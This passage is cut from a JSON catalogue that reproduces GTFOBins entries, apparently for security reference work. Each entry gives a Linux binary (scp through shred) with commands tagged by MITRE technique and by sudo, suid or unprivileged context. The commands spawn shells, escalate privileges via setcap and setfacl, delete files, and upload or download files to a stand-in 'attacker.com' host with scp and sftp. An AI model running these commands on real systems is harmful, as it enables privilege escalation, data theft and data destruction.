x:","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/scp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scp:upload:0:sudo","toolId":"gtfo:scp","toolName":"scp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"scp /path/to/input-file user@attacker.com:/path/to/output-file","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/scp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scp:upload:0:suid","toolId":"gtfo:scp","toolName":"scp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"scp /path/to/input-file user@attacker.com:/path/to/output-file","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/scp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scp:upload:0:unprivileged","toolId":"gtfo:scp","toolName":"scp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"scp /path/to/input-file user@attacker.com:/path/to/output-file","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/scp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:screen:file-write:0:sudo","toolId":"gtfo:screen","toolName":"screen","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"screen -L -Logfile /path/to/output-file echo DATA","description":"Data is appended to the file and `\\n` is converted to `\\r\\n`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/screen/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:screen:file-write:0:unprivileged","toolId":"gtfo:screen","toolName":"screen","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"screen -L -Logfile /path/to/output-file echo DATA","description":"Data is appended to the file and `\\n` is converted to `\\r\\n`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/screen/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:screen:file-write:1:sudo","toolId":"gtfo:screen","toolName":"screen","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"screen -L /path/to/output-file echo DATA","description":"Data is appended to the file and `\\n` is converted to `\\r\\n`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/screen/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:screen:file-write:1:unprivileged","toolId":"gtfo:screen","toolName":"screen","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"screen -L /path/to/output-file echo DATA","description":"Data is appended to the file and `\\n` is converted to `\\r\\n`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/screen/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:screen:shell:0:sudo","toolId":"gtfo:screen","toolName":"screen","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"screen","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/screen/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:screen:shell:0:unprivileged","toolId":"gtfo:screen","toolName":"screen","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"screen","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/screen/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:script:file-write:0:sudo","toolId":"gtfo:script","toolName":"script","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"script -q -c '# DATA' /path/to/output-file","description":"The content appears among the log prints.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/script/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:script:file-write:0:suid","toolId":"gtfo:script","toolName":"script","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"script -q -c '# DATA' /path/to/output-file","description":"The content appears among the log prints.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/script/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:script:file-write:0:unprivileged","toolId":"gtfo:script","toolName":"script","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"script -q -c '# DATA' /path/to/output-file","description":"The content appears among the log prints.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/script/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:script:shell:0:sudo","toolId":"gtfo:script","toolName":"script","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"script -q /dev/null","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/script/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:script:shell:0:suid","toolId":"gtfo:script","toolName":"script","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"script -q /dev/null","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/script/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:script:shell:0:unprivileged","toolId":"gtfo:script","toolName":"script","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"script -q /dev/null","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/script/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scrot:shell:0:sudo","toolId":"gtfo:scrot","toolName":"scrot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"scrot -e /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/scrot/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scrot:shell:0:suid","toolId":"gtfo:scrot","toolName":"scrot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"scrot -e /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/scrot/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scrot:shell:0:unprivileged","toolId":"gtfo:scrot","toolName":"scrot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"scrot -e /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/scrot/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sed:file-read:0:sudo","toolId":"gtfo:sed","toolName":"sed","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sed '' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sed:file-read:0:suid","toolId":"gtfo:sed","toolName":"sed","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sed '' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sed:file-read:0:unprivileged","toolId":"gtfo:sed","toolName":"sed","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"sed '' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sed:file-write:0:sudo","toolId":"gtfo:sed","toolName":"sed","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"sed -n '1s/.*/DATA/w /path/to/output-file' /etc/hosts","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sed:file-write:0:suid","toolId":"gtfo:sed","toolName":"sed","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"sed -n '1s/.*/DATA/w /path/to/output-file' /etc/hosts","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sed:file-write:0:unprivileged","toolId":"gtfo:sed","toolName":"sed","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"sed -n '1s/.*/DATA/w /path/to/output-file' /etc/hosts","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sed:shell:0:sudo","toolId":"gtfo:sed","toolName":"sed","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sed -n '1e exec /bin/sh 1>&0' /etc/hosts","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sed:shell:0:suid","toolId":"gtfo:sed","toolName":"sed","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sed -n '1e exec /bin/sh 1>&0' /etc/hosts","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sed:shell:0:unprivileged","toolId":"gtfo:sed","toolName":"sed","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sed -n '1e exec /bin/sh 1>&0' /etc/hosts","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sed:shell:1:sudo","toolId":"gtfo:sed","toolName":"sed","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sed e","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sed:shell:1:suid","toolId":"gtfo:sed","toolName":"sed","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sed e","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sed:shell:1:unprivileged","toolId":"gtfo:sed","toolName":"sed","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sed e","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:service:shell:0:sudo","toolId":"gtfo:service","toolName":"service","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"service ../../bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/service/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:service:shell:0:unprivileged","toolId":"gtfo:service","toolName":"service","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"service ../../bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/service/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:setarch:shell:0:sudo","toolId":"gtfo:setarch","toolName":"setarch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"setarch -3 /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/setarch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:setarch:shell:0:suid","toolId":"gtfo:setarch","toolName":"setarch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"setarch -3 /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/setarch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:setarch:shell:0:unprivileged","toolId":"gtfo:setarch","toolName":"setarch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"setarch -3 /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/setarch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:setcap:privilege-escalation:0:sudo","toolId":"gtfo:setcap","toolName":"setcap","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"setcap cap_setuid+ep /path/to/command","description":"This can be used to assign capabilities to executable files.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/setcap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:setcap:privilege-escalation:0:suid","toolId":"gtfo:setcap","toolName":"setcap","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"setcap cap_setuid+ep /path/to/command","description":"This can be used to assign capabilities to executable files.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/setcap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:setfacl:privilege-escalation:0:sudo","toolId":"gtfo:setfacl","toolName":"setfacl","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"setfacl -m u:$(id -un):rwx /path/to/input-file","description":"This can be run with elevated privileges to change ownership and then read, write, or execute a file.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/setfacl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:setfacl:privilege-escalation:0:suid","toolId":"gtfo:setfacl","toolName":"setfacl","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"setfacl -m u:$(id -un):rwx /path/to/input-file","description":"This can be run with elevated privileges to change ownership and then read, write, or execute a file.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/setfacl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:setlock:shell:0:sudo","toolId":"gtfo:setlock","toolName":"setlock","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"setlock - /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/setlock/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:setlock:shell:0:suid","toolId":"gtfo:setlock","toolName":"setlock","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"setlock - /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/setlock/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:setlock:shell:0:unprivileged","toolId":"gtfo:setlock","toolName":"setlock","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"setlock - /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/setlock/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sftp:download:0:sudo","toolId":"gtfo:sftp","toolName":"sftp","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"sftp user@attacker.com\nget /path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sftp:download:0:suid","toolId":"gtfo:sftp","toolName":"sftp","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"sftp user@attacker.com\nget /path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sftp:download:0:unprivileged","toolId":"gtfo:sftp","toolName":"sftp","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"sftp user@attacker.com\nget /path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sftp:shell:0:sudo","toolId":"gtfo:sftp","toolName":"sftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sftp user@attacker.com\n!/bin/sh","description":"This still requires a successfull connection to the server.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sftp:shell:0:suid","toolId":"gtfo:sftp","toolName":"sftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sftp user@attacker.com\n!/bin/sh","description":"This still requires a successfull connection to the server.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sftp:shell:0:unprivileged","toolId":"gtfo:sftp","toolName":"sftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sftp user@attacker.com\n!/bin/sh","description":"This still requires a successfull connection to the server.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sftp:upload:0:sudo","toolId":"gtfo:sftp","toolName":"sftp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"sftp user@attacker.com\nput /path/to/input-file /path/to/output-file","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sftp:upload:0:suid","toolId":"gtfo:sftp","toolName":"sftp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"sftp user@attacker.com\nput /path/to/input-file /path/to/output-file","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sftp:upload:0:unprivileged","toolId":"gtfo:sftp","toolName":"sftp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"sftp user@attacker.com\nput /path/to/input-file /path/to/output-file","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sg:shell:0:sudo","toolId":"gtfo:sg","toolName":"sg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sg root","description":"Commands can be run if the current user's group is specified, therefore no additional permissions are needed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sg:shell:0:unprivileged","toolId":"gtfo:sg","toolName":"sg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sg $(id -ng)","description":"Commands can be run if the current user's group is specified, therefore no additional permissions are needed.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:shred:file-write:0:sudo","toolId":"gtfo:shred","toolName":"shred","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"shred -u /path/to/output-file","description":"This actually deletes the chosen file.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/shred/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:shred:file-write:0:suid","toolId":"gtfo:shred","toolName":"shred","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"shred -u /path/to/output-file","description":"This actually deletes the chosen file.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/shred/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:shred:file-write:0:unprivileged","toolId":"gtfo:shred","toolName":"shred","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"shred -u /path/to/output-file","description":"This actually deletes the chosen file.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/shred/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local 